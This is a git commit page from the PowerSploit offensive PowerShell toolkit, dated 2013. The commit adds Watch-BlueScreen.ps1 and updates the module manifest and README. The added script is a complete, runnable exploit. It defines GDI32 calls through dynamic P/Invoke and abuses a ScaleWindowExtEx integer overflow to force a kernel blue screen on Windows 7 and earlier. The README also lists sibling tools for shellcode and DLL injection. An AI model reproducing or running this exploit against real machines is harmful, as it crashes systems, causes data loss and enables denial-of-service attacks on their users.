Added Watch-BlueScreen

Causes a blue-screen (bugcheck) to occur.
author: Matt Graeber <mattgraeber@gmail.com> 2013-05-13 20:01:59 -0400
committer: Matt Graeber <mattgraeber@gmail.com> 2013-05-13 20:01:59 -0400
commit: 2a17b8fb56db07519e8e6b7d6819749ce743c882 (patch)
tree: 7315164342e510e3ab7b7feccdaab24204a53f3b
parent: f32a572fb971f288d2950af9a6c6d2031a52df2b (diff)
download: PowerSploit-2a17b8fb56db07519e8e6b7d6819749ce743c882.tar.gz
PowerSploit-2a17b8fb56db07519e8e6b7d6819749ce743c882.zip
3 files changed, 79 insertions, 1 deletions
diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1
index 180c25e..c6c87f7 100644
--- a/CodeExecution/CodeExecution.psd1
+++ b/CodeExecution/CodeExecution.psd1
@@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID =
 
 # List of all files packaged with this module
 FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', 
-               'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectiveDllInjection.ps1', 'Usage.md'
+               'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectiveDllInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md'
 
 # Private data to pass to the module specified in RootModule/ModuleToProcess
 # PrivateData = ''
diff --git a/CodeExecution/Watch-BlueScreen.ps1 b/CodeExecution/Watch-BlueScreen.ps1
new file mode 100644
index 0000000..8523bf2
--- /dev/null
+++ b/CodeExecution/Watch-BlueScreen.ps1
@@ -0,0 +1,74 @@
+function Watch-BlueScreen
+{
+<#
+.SYNOPSIS
+
+    Cause a blue screen to occur (Windows 7 and below).
+
+    PowerSploit Function: Watch-BlueScreen
+    Author: Matthew Graeber (@mattifestation)
+    Original Research: Tavis Ormandy and Nikita Tarakanov
+    License: BSD 3-Clause
+    Required Dependencies: None
+    Optional Dependencies: None
+
+.NOTES
+
+    Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
+    ‏tweeted this technique on 5/13/2013.
+
+.LINK
+
+    https://gist.github.com/taviso/4658638
+    http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
+    https://twitter.com/NTarakanov/status/334031968465453057
+#>
+
+    try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
+    {
+        $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
+        $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
+        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
+        $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
+
+        $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
+        $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
+        $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
+                                                                                          [Reflection.FieldInfo[]]@($SetLastError), @($true))
+
+        $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
+                                          'Gdi32.dll',
+                                          'Public, Static',
+                                          'Standard',
+                                          [IntPtr],
+                                          @([IntPtr]),
+                                          'Winapi',
+                                          'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
+
+        $TypeBuilder.DefinePInvokeMethod( 'SetLayout',
+                                          'Gdi32.dll',
+                                          'Public, Static',
+                                          'Standard',
+                                          [UInt32],
+                                          @([IntPtr], [UInt32]),
+                                          'Winapi',
+                                          'Auto' ) | Out-Null
+
+        $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
+                                          'Gdi32.dll',
+                                          'Public, Static',
+                                          'Standard',
+                                          [Bool],
+                                          @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
+                                          'Winapi',
+                                          'Auto' ) | Out-Null
+
+        $Gdi32 = $TypeBuilder.CreateType()
+    }
+
+    $LAYOUT_RTL = 1
+
+    $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
+    $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
+    $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
+}
+\ No newline at end of file
diff --git a/README.md b/README.md
index 94a80e3..89ecb42 100644
--- a/README.md
+++ b/README.md
@@ -20,6 +20,10 @@ Injects shellcode into the process ID of your choosing or within PowerShell loca
 
 Execute shellcode within the context of the running PowerShell process without making any Win32 function calls.
 
+#### `Watch-BlueScreen`
+
+Cause a blue screen to occur (Windows 7 and below).
+
 ## ScriptModification
 
 **Modify and/or prepare scripts for execution on a compromised machine.**
author	Matt Graeber <mattgraeber@gmail.com>	2013-05-13 20:01:59 -0400
committer	Matt Graeber <mattgraeber@gmail.com>	2013-05-13 20:01:59 -0400
commit	2a17b8fb56db07519e8e6b7d6819749ce743c882 (patch)
tree	7315164342e510e3ab7b7feccdaab24204a53f3b
parent	f32a572fb971f288d2950af9a6c6d2031a52df2b (diff)
download	PowerSploit-2a17b8fb56db07519e8e6b7d6819749ce743c882.tar.gz PowerSploit-2a17b8fb56db07519e8e6b7d6819749ce743c882.zip